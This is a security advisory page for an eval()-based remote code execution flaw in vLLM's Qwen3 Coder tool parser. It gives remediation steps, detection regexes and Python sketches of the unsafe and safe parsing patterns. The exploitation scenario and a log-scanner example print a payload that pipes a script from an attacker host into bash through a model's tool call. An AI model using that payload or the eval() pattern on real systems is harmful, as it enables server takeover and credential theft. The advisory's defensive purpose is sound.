CVE-2025-9141: vLLM: RCE via eval() in Qwen3 Coder tool parser

GHSA-79j6-g2m3-jgfw HIGH
Published August 21, 2025
CISO Take

If you run vLLM >=0.10.0 with Qwen3 Coder and tool calling enabled, any authenticated API user can execute arbitrary code on your inference server — patch to 0.10.1.1 immediately. As an immediate workaround, remove --enable-auto-tool-choice and --tool-call-parser qwen3_coder from your startup config. Inference servers typically run with broad internal access and hold sensitive credentials, making post-exploitation blast radius severe.

Risk Assessment

High severity (CVSS 8.8). Exploitability is high: the flaw is network-accessible and low-complexity, requiring only standard API authentication with no elevated privileges or user interaction. LLM inference servers commonly hold API keys, model weights, and internal network access. vLLM is a widely deployed inference backbone across enterprise and cloud AI stacks, which broadens exposure significantly.

Affected Systems

Package: vllm
Ecosystem: pip
Vulnerable range: >= 0.10.0, < 0.10.1.1
Patched version: 0.10.1.1


Severity & Risk

CVSS 3.1
8.8 / 10
EPSS
N/A
Exploitation Status
No known exploitation
Sophistication
Moderate

Attack Surface

AV Network
AC Low
PR Low
UI None
S Unchanged
C High
I High
A High

Recommended Action

5 steps
  1. PATCH

    Upgrade vllm to >=0.10.1.1 immediately on all inference nodes.

  2. WORKAROUND

    If patching is delayed, remove the --enable-auto-tool-choice and --tool-call-parser qwen3_coder flags from all startup configs and restart services.

  3. NETWORK

    Restrict vLLM API access to trusted internal clients only; never expose inference endpoints to the public internet without strong authentication and IP allowlisting.

  4. DETECT

    Audit API request logs for tool call parameters containing Python syntax patterns (parentheses, 'import', 'os.', 'subprocess.', '__') as exploitation indicators.

  5. VERIFY

    Audit all running vLLM versions with 'pip show vllm' across inference nodes.
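Steps 1 and 5 above can be sketched as a short Python check run on each inference node. The naive tuple-based version parsing below is illustrative only; production tooling should use `packaging.version` instead:

```python
from importlib.metadata import version, PackageNotFoundError

# First patched release per the advisory
PATCHED = (0, 10, 1, 1)

def parse(v: str) -> tuple[int, ...]:
    # Naive dotted-numeric parser; pre-release suffixes are dropped,
    # so e.g. "0.10.1rc1" is conservatively treated as unpatched.
    return tuple(int(p) for p in v.split(".") if p.isdigit())

def is_patched(installed: str) -> bool:
    return parse(installed) >= PATCHED

try:
    v = version("vllm")
    print("patched" if is_patched(v) else f"vllm {v} VULNERABLE - upgrade to >=0.10.1.1")
except PackageNotFoundError:
    print("vllm not installed on this node")
```

Tuple comparison makes the four-component patched version (0.10.1.1) correctly rank above 0.10.1 and below 0.10.2.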

Classification

Compliance Impact

This CVE is relevant to:

EU AI Act
Art.15 - Accuracy, Robustness and Cybersecurity
ISO 42001
A.6.2 - AI System Operation and Monitoring
NIST AI RMF
MANAGE-2.2 - Mechanisms for AI Risk Treatment
OWASP LLM Top 10
LLM02 - Insecure Output Handling
LLM05 - Supply Chain Vulnerabilities
LLM07 - Insecure Plugin Design

Frequently Asked Questions

What is CVE-2025-9141?

If you run vLLM >=0.10.0 with Qwen3 Coder and tool calling enabled, any authenticated API user can execute arbitrary code on your inference server — patch to 0.10.1.1 immediately. As an immediate workaround, remove --enable-auto-tool-choice and --tool-call-parser qwen3_coder from your startup config. Inference servers typically run with broad internal access and hold sensitive credentials, making post-exploitation blast radius severe.

Is CVE-2025-9141 actively exploited?

No confirmed active exploitation of CVE-2025-9141 has been reported, but organizations should still patch proactively.

How to fix CVE-2025-9141?

1. PATCH: Upgrade vllm to >=0.10.1.1 immediately on all inference nodes.
2. WORKAROUND (if patching is delayed): Remove --enable-auto-tool-choice and --tool-call-parser qwen3_coder flags from all startup configs and restart services.
3. NETWORK: Restrict vLLM API access to trusted internal clients only; never expose inference endpoints to the public internet without strong authentication and IP allowlisting.
4. DETECT: Audit API request logs for tool call parameters containing Python syntax patterns (parentheses, 'import', 'os.', 'subprocess.', '__') as exploitation indicators.
5. VERIFY: Audit all running vLLM versions with 'pip show vllm' across inference nodes.

What systems are affected by CVE-2025-9141?

This vulnerability affects the following AI/ML architecture patterns: LLM inference serving, agent frameworks, tool-enabled LLM pipelines, agentic AI platforms, multi-tenant AI API services.

What is the CVSS score for CVE-2025-9141?

CVE-2025-9141 has a CVSS v3.1 base score of 8.8 (HIGH).

Technical Details

NVD Description

### Summary

An unsafe deserialization vulnerability allows any authenticated user to execute arbitrary code on the server if they are able to get the model to pass the code as an argument to a tool call.

### Details

vLLM's [Qwen3 Coder tool parser](https://github.com/vllm-project/vllm/blob/main/vllm/entrypoints/openai/tool_parsers/qwen3coder_tool_parser.py) contains a code execution path that uses Python's `eval()` function to parse tool call parameters. This occurs during the parameter conversion process when the parser attempts to handle unknown data types. This code path is reached when:

1. Tool calling is enabled (`--enable-auto-tool-choice`)
2. The qwen3_coder parser is specified (`--tool-call-parser qwen3_coder`)
3. The parameter type is not explicitly defined or recognized

### Impact

Remote Code Execution via Python's `eval()` function.
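As a simplified, hypothetical illustration of this class of bug and its standard remediation (this is not vLLM's actual parser code): an `eval()` fallback for unrecognized parameter types executes attacker-controlled strings, whereas `ast.literal_eval()` accepts only Python literals and rejects anything containing a function call:

```python
import ast

def convert_param_unsafe(value: str):
    # The vulnerable pattern in miniature: evaluating a parameter value
    # of unknown type with eval() runs arbitrary attacker-supplied code.
    return eval(value)  # DANGEROUS: never use on untrusted input

def convert_param_safe(value: str):
    # literal_eval parses only literals (numbers, strings, lists, dicts,
    # tuples, booleans, None) and raises on calls like __import__(...).
    try:
        return ast.literal_eval(value)
    except (ValueError, SyntaxError):
        return value  # treat unparseable input as a plain string

print(convert_param_safe("[1, 2, 3]"))                    # → [1, 2, 3]
print(convert_param_safe("__import__('os').system('id')"))  # returned inert, never executed
```

The key property is that literal-only parsing fails closed: malicious input degrades to an inert string instead of executing.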

Exploitation Scenario

An adversary with valid but low-privileged API credentials (a stolen service account, a malicious insider, or a compromised client in a multi-tenant deployment) sends a crafted tool call request to a vLLM endpoint running Qwen3 Coder. The tool call includes a parameter with an unrecognized or ambiguous type, triggering the parser's `eval()` fallback path. The adversary injects a payload such as `__import__('os').system('curl attacker.com/shell.sh | bash')` as the parameter value. The payload executes on the inference server under the process owner's privileges, enabling credential theft, internal network pivoting, model weight exfiltration, or persistent backdoor installation.
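The DETECT guidance from the recommended actions can be sketched as a small log-scanning helper. The indicator patterns and the parameter-dict shape below are assumptions for illustration, not a documented vLLM log format:

```python
import re

# Indicator patterns for Python code appearing where plain data is expected.
# Tune for your environment; these will produce false positives on logs of
# code-generation traffic, so treat hits as leads, not verdicts.
SUSPICIOUS = re.compile(r"__import__|subprocess\.|os\.system|\beval\(|\bexec\(")

def flag_tool_call_params(params: dict[str, str]) -> list[str]:
    """Return names of tool-call parameters whose values look like Python code."""
    return [name for name, value in params.items() if SUSPICIOUS.search(value)]

print(flag_tool_call_params({
    "path": "/tmp/report.txt",
    "cmd": "__import__('os').system('curl attacker.example/shell.sh | bash')",
}))  # → ['cmd']
```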

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
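The 8.8 base score can be reproduced from this vector with the published CVSS 3.1 equations (metric weights and the Roundup function are from the first.org specification):

```python
# Weights for AV:N / AC:L / PR:L (scope unchanged) / UI:N
AV, AC, PR, UI = 0.85, 0.77, 0.62, 0.85
C = I = A = 0.56  # High impact on confidentiality, integrity, availability

def roundup(x: float) -> float:
    # CVSS 3.1 Roundup: smallest number, to one decimal, >= x
    i = round(x * 100000)
    return i / 100000 if i % 10000 == 0 else (i // 10000 + 1) / 10

iss = 1 - (1 - C) * (1 - I) * (1 - A)        # Impact Sub-Score
impact = 6.42 * iss                          # Scope: Unchanged
exploitability = 8.22 * AV * AC * PR * UI
base = roundup(min(impact + exploitability, 10))
print(base)  # → 8.8
```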

Timeline

Published
August 21, 2025
Last Modified
August 21, 2025
First Seen
March 24, 2026

Related Vulnerabilities